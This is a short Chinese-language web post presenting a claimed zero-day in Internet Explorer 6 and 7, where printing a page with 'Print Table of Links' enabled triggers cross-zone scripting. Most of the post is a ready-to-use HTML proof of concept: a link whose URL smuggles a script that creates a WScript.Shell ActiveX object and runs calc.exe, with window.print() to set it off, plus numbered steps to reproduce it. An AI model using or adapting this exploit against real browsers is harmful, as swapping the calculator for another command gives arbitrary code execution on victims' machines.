IE 0day for IE6 and IE7

这个漏洞是由于微软IE浏览器启动“Print Table of Links”时引起的跨站攻击（Cross-Zone Scripting ）
如果启用了 "Print Table of Links"，在打印一个网页的时候，能够导致执行任意代码。
　　1.选择“Print Table of Links”选项
2.把保存以下代码为HTML格式，用IE打开，并打印，会执行calc.exe。
<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject(WScript.Shell);x.Run(calc.exe);</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html> 
 

补充：综合编程 , 安全编程 ,

上一个：开机吓人的批处理程序源代码
下一个：基于交叉引用的搜索检测object hook